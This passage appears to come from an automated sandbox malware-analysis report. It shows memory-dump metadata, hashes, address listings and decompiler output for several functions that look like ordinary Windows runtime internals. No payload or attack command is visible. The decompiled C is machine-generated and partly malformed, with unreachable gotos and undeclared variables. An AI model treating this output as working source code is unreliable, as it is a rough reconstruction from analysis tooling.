                                                        0x047ef0a0
                                                        0x047ef0a0
                                                        0x047ef09e
                                                        0x047ef053
                                                        0x047ef064
                                                        0x047ef064
                                                        0x047ef06b
                                                        0x0483bb1a
                                                        0x0483bb1a
                                                        0x047ef071
                                                        0x047ef071
                                                        0x047ef07d
                                                        0x047ef082
                                                        0x047ef08f
                                                        0x047ef08f
                                                        0x047ef009
                                                        0x047ef00d
                                                        0x00000000
                                                        0x047ef00d
                                                        0x047eefd0
                                                        0x047eef97
                                                        0x047eefa5
                                                        0x047eefaa
                                                        0x00000000
                                                        0x047eefac
                                                        0x047eefac
                                                        0x047eefac
                                                        0x00000000
                                                        0x047eefb2
                                                        0x047ef036
                                                        0x047ef03a
                                                        0x047ef040
                                                        0x047ef090
                                                        0x00000000
                                                        0x047ef092
                                                        0x047ef042
                                                        0x00000000
                                                        0x047ef042
                                                        0x047eefb7
                                                        0x047eefb9
                                                        0x047eefbc
                                                        0x047eefb0
                                                        0x047eefb0
                                                        0x00000000
                                                        0x047eefbe
                                                        0x047eefbe
                                                        0x047eefc1
                                                        0x00000000
                                                        0x047eefc1
                                                        0x047eefbc
                                                        0x047eefaa
                                                        0x047eef91

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction ID: f8516799e06b768070c30d8af30d141f9429a3820845a59460606cddc26a769d
                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction Fuzzy Hash: AD510230A04249EFDB20CF6AC0807BEBBB1AF49314F188BA9D54597782D375B989D791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A740D, Relevance: .1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E048A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0482D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0481F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L047F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L047F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0481F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L047F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                        0x048a740d
                                                        0x048a740d
                                                        0x048a7412
                                                        0x048a7413
                                                        0x048a7416
                                                        0x048a7418
                                                        0x048a741c
                                                        0x048a741f
                                                        0x048a7422
                                                        0x048a7422
                                                        0x048a7428
                                                        0x048a742a
                                                        0x048a742a
                                                        0x048a7451
                                                        0x048a7432
                                                        0x048a744f
                                                        0x048a744f
                                                        0x00000000
                                                        0x048a7434
                                                        0x048a7438
                                                        0x048a7443
                                                        0x048a7517
                                                        0x048a7517
                                                        0x048a751a
                                                        0x048a7535
                                                        0x048a7520
                                                        0x048a7527
                                                        0x048a752c
                                                        0x048a7531
                                                        0x048a7533
                                                        0x00000000
                                                        0x048a7533
                                                        0x00000000
                                                        0x048a7531
                                                        0x048a754b
                                                        0x048a754f
                                                        0x048a755c
                                                        0x048a755c
                                                        0x048a755f
                                                        0x048a7560
                                                        0x048a7561
                                                        0x048a7562
                                                        0x048a7563
                                                        0x048a7568
                                                        0x048a756a
                                                        0x048a756c
                                                        0x048a756d
                                                        0x048a756d
                                                        0x048a756f
                                                        0x048a7572
                                                        0x048a7574
                                                        0x048a7577
                                                        0x048a757c
                                                        0x048a757f
                                                        0x00000000
                                                        0x048a7551
                                                        0x048a7551
                                                        0x048a7551
                                                        0x048a7553
                                                        0x048a7553
                                                        0x048a7449
                                                        0x048a7449
                                                        0x048a744c
                                                        0x048a744c
                                                        0x00000000
                                                        0x048a744c
                                                        0x048a7443
                                                        0x048a750e
                                                        0x048a7514
                                                        0x048a7514
                                                        0x048a7455
                                                        0x048a7469
                                                        0x048a746d
                                                        0x00000000
                                                        0x048a7473
                                                        0x048a7473
                                                        0x048a7476
                                                        0x048a7480
                                                        0x048a7484
                                                        0x048a748e
                                                        0x048a7493
                                                        0x048a7493
                                                        0x048a7496
                                                        0x048a7499
                                                        0x048a74a1
                                                        0x048a74b1
                                                        0x048a74b5
                                                        0x00000000
                                                        0x048a74bb
                                                        0x048a74c1
                                                        0x048a74c1
                                                        0x048a74c4
                                                        0x048a74c5
                                                        0x048a74c6
                                                        0x048a74c7
                                                        0x048a74c8
                                                        0x048a74cd
                                                        0x00000000
                                                        0x048a74d3
                                                        0x048a74d3
                                                        0x048a74d6
                                                        0x048a74d8
                                                        0x048a74db
                                                        0x048a74dd
                                                        0x048a74e0
                                                        0x048a74e7
                                                        0x048a74ee
                                                        0x048a74ee
                                                        0x048a74f4
                                                        0x048a74f9
                                                        0x00000000
                                                        0x048a74fb
                                                        0x048a74fb
                                                        0x048a74fd
                                                        0x048a7500
                                                        0x048a7503
                                                        0x048a7505
                                                        0x048a7505
                                                        0x048a74f9
                                                        0x00000000
                                                        0x048a74cd
                                                        0x048a74b5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction ID: 242471a89ab7a4bd73fd074957163264c5dcbf7f9de3ce494b47795878e154ca
                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction Fuzzy Hash: E9517C71600606EFEB15CF14C880A56BBB5FF45308F1486AAE908DF212E3B1FA56DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04802990, Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E04802990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x48aff00);
				E0482D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x47b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0481E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x47b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E048551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x47b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04802AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E047E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04802C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E047EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04802AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04802C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04802ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0482D0D1(_t62);
				goto L28;
			}





















                                                        0x04802990
                                                        0x04802992
                                                        0x04802997
                                                        0x048029a3
                                                        0x048029a6
                                                        0x048029ab
                                                        0x048029ad
                                                        0x048029b2
                                                        0x04845c80
                                                        0x048029b8
                                                        0x048029b8
                                                        0x048029bb
                                                        0x048029c0
                                                        0x048029c5
                                                        0x048029c6
                                                        0x048029c6
                                                        0x048029cb
                                                        0x00000000
                                                        0x00000000
                                                        0x048029cd
                                                        0x048029d0
                                                        0x048029d9
                                                        0x048029db
                                                        0x048029dd
                                                        0x04802a7f
                                                        0x04802a84
                                                        0x04802a87
                                                        0x04802a89
                                                        0x04845ca1
                                                        0x04845ca3
                                                        0x00000000
                                                        0x04802a8f
                                                        0x04802a8f
                                                        0x00000000
                                                        0x04802a8f
                                                        0x00000000
                                                        0x048029e3
                                                        0x048029e3
                                                        0x048029e3
                                                        0x00000000
                                                        0x048029e3
                                                        0x048029dd
                                                        0x00000000
                                                        0x048029db
                                                        0x048029e6
                                                        0x048029e9
                                                        0x048029eb
                                                        0x048029ed
                                                        0x048029f3
                                                        0x048029f5
                                                        0x048029f8
                                                        0x048029fa
                                                        0x04802a97
                                                        0x04802a9a
                                                        0x04802a9d
                                                        0x04802add
                                                        0x00000000
                                                        0x04802a9f
                                                        0x04802aa2
                                                        0x04802aa5
                                                        0x04802aa8
                                                        0x04802aab
                                                        0x04845cab
                                                        0x04845caf
                                                        0x04845cc5
                                                        0x04845cda
                                                        0x04845cdc
                                                        0x04845cdf
                                                        0x04845ce5
                                                        0x00000000
                                                        0x04845ceb
                                                        0x04845ced
                                                        0x04845cee
                                                        0x00000000
                                                        0x04845cee
                                                        0x04845cb1
                                                        0x04845cb4
                                                        0x04845cb9
                                                        0x04845cbb
                                                        0x00000000
                                                        0x04845cbd
                                                        0x04845cbd
                                                        0x00000000
                                                        0x04845cbd
                                                        0x04845cbb
                                                        0x04802ab1
                                                        0x04802ab1
                                                        0x04802ac4
                                                        0x04802ac6
                                                        0x04802ac6
                                                        0x00000000
                                                        0x04802ac6
                                                        0x04802aab
                                                        0x00000000
                                                        0x04802a00
                                                        0x04802a09
                                                        0x04802a0e
                                                        0x04802a21
                                                        0x04802a24
                                                        0x04802a35
                                                        0x04802a3a
                                                        0x04802a3d
                                                        0x04802a42
                                                        0x04802a59
                                                        0x04802a59
                                                        0x04802a5c
                                                        0x04802a5f
                                                        0x04802a5f
                                                        0x048029fa
                                                        0x048029f3
                                                        0x04802a64
                                                        0x04802a64
                                                        0x04802a6b
                                                        0x04802a6b
                                                        0x04802a6d
                                                        0x04802a72
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1179e3163b187f90e99f43331fc310057f7e264ba8d7a5608bdaef6631c01e8a
                                                        • Instruction ID: d39df56b690412d3c1dc0edf616abe791a48c8b0839423ab4d1379ad53a8bfa9
                                                        • Opcode Fuzzy Hash: 1179e3163b187f90e99f43331fc310057f7e264ba8d7a5608bdaef6631c01e8a
                                                        • Instruction Fuzzy Hash: CB517D31A10219EFDF65DF58CC44ADEBBB5BF48314F108695E800E72A0D7B5AD92CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04804D3B, Relevance: .1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E04804D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x48cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0481FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x48c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0481B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L047F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E047DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0481B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0481F380(_t67 + 0xc, 0x47b5138, 0x10) == 0) {
								 *0x48c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04804F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04804E70(0x48c86b0, 0x4805690, 0, 0) != 0) {
					_t46 = E047DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                        0x04804d3b
                                                        0x04804d4d
                                                        0x04804d53
                                                        0x04804d58
                                                        0x04804d65
                                                        0x04804d6c
                                                        0x04804d71
                                                        0x04804d77
                                                        0x04804d7f
                                                        0x04804d8c
                                                        0x04804d8e
                                                        0x04804dad
                                                        0x04804db0
                                                        0x04804db7
                                                        0x04804db8
                                                        0x04804db9
                                                        0x04804dba
                                                        0x04804dbb
                                                        0x04804dc1
                                                        0x04804dc8
                                                        0x04804dcc
                                                        0x04804dd5
                                                        0x04804dde
                                                        0x04804ddf
                                                        0x04804de0
                                                        0x04804de1
                                                        0x04804de6
                                                        0x04804de7
                                                        0x04804de9
                                                        0x04804df3
                                                        0x00000000
                                                        0x00000000
                                                        0x04846c7c
                                                        0x04846c8a
                                                        0x04846c8a
                                                        0x04846c9d
                                                        0x04846ca7
                                                        0x04846cac
                                                        0x04846cb2
                                                        0x04846cb9
                                                        0x00000000
                                                        0x04846cbf
                                                        0x04846cbf
                                                        0x00000000
                                                        0x04846cbf
                                                        0x04846cb9
                                                        0x04804dfb
                                                        0x04846ccf
                                                        0x04846cd3
                                                        0x04804e32
                                                        0x04804e39
                                                        0x04846ce0
                                                        0x04846cf2
                                                        0x04846cf2
                                                        0x04846ce0
                                                        0x04804e3f
                                                        0x04804e41
                                                        0x04804e51
                                                        0x04804e51
                                                        0x04804e03
                                                        0x04804e03
                                                        0x04804e09
                                                        0x04804e0f
                                                        0x04804e57
                                                        0x00000000
                                                        0x00000000
                                                        0x04804e1b
                                                        0x04804e30
                                                        0x04804e5b
                                                        0x04804e5b
                                                        0x00000000
                                                        0x04804e30
                                                        0x04804e11
                                                        0x04804e11
                                                        0x04804e16
                                                        0x00000000
                                                        0x04804e16
                                                        0x04804e01
                                                        0x00000000
                                                        0x04804e01
                                                        0x04804da5
                                                        0x04846c6b
                                                        0x00000000
                                                        0x04804dab
                                                        0x04804dab
                                                        0x00000000
                                                        0x04804dab

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be75d3f0f552fc92e9ae396e3672f7802d490f8a8dd18c341b01a4ac6535a0d3
                                                        • Instruction ID: 86dcfa6875a158bd1a0ea7a959ef2db6652bb2b4629f39ae1da1a1d48d2fe1c3
                                                        • Opcode Fuzzy Hash: be75d3f0f552fc92e9ae396e3672f7802d490f8a8dd18c341b01a4ac6535a0d3
                                                        • Instruction Fuzzy Hash: FB412771A90308AFEB61DF14CD80F66B7A9EB44B14F004A9AEA05D7380E7B4FD40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04804BAD, Relevance: .1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E04804BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x48cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E047DCC50(_t86);
					L11:
					return E0481B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x48c8504
				E047F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0481FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0481B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L047F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E047DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x48c8504
								E047EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04804F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                        0x04804bad
                                                        0x04804bbf
                                                        0x04804bc2
                                                        0x04804bc6
                                                        0x04804bcd
                                                        0x04804bd9
                                                        0x048467fe
                                                        0x04846800
                                                        0x04804ccc
                                                        0x04804ccd
                                                        0x04804cb7
                                                        0x04804cc9
                                                        0x04804cc9
                                                        0x04804bdf
                                                        0x04804be5
                                                        0x00000000
                                                        0x00000000
                                                        0x04804beb
                                                        0x04804bef
                                                        0x00000000
                                                        0x00000000
                                                        0x04804bf5
                                                        0x04804bf9
                                                        0x04804c06
                                                        0x04804c0b
                                                        0x04804c17
                                                        0x04804c1c
                                                        0x04804c1f
                                                        0x04804c25
                                                        0x04804c33
                                                        0x04804c3d
                                                        0x04804c40
                                                        0x04804c43
                                                        0x04804c47
                                                        0x04804c4d
                                                        0x04804c53
                                                        0x04804c54
                                                        0x04804c55
                                                        0x04804c56
                                                        0x04804c5b
                                                        0x04804c5c
                                                        0x04804c63
                                                        0x04804c6b
                                                        0x00000000
                                                        0x00000000
                                                        0x04846776
                                                        0x04846784
                                                        0x04846784
                                                        0x0484679f
                                                        0x048467a7
                                                        0x048467af
                                                        0x048467ce
                                                        0x00000000
                                                        0x048467b1
                                                        0x048467b7
                                                        0x048467b8
                                                        0x048467c1
                                                        0x048467d3
                                                        0x048467d9
                                                        0x048467dd
                                                        0x04804c94
                                                        0x04804c94
                                                        0x04804c98
                                                        0x04804c9c
                                                        0x04804ca3
                                                        0x048467f4
                                                        0x048467f4
                                                        0x04804cb5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04804cb5
                                                        0x04804c79
                                                        0x04804c7e
                                                        0x04804c89
                                                        0x04804c8b
                                                        0x04804c8f
                                                        0x04804c8f
                                                        0x00000000
                                                        0x04804c89
                                                        0x048467c3
                                                        0x00000000
                                                        0x048467c3
                                                        0x048467af
                                                        0x04804c73
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
